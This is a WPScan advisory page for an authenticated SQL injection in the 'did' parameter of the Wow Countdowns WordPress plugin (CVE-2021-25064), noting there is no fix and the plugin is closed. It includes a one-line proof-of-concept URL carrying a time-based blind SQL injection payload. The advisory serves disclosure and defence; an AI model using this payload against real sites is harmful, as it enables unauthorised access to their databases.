WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Wow Countdowns <= 3.1.2 - Admin+ SQLi

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=mwp-countdown&info=del&did=1+AND+(SELECT+5382+FROM+(SELECT(SLEEP(5)))PpNt)

Affects Plugins

mwp-countdown
No known fix - plugin closed

References

CVE
CVE-2021-25064

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

0xdecafbad

Submitter website
http://vuln.farm
Verified

Yes

WPVDB ID
30c70315-3c17-41f0-a12f-7e3f793e259c

Timeline

Publicly Published

2022-03-07 (about 1 years ago)

Added

2022-03-07 (about 1 years ago)

Last Updated

2022-04-09 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin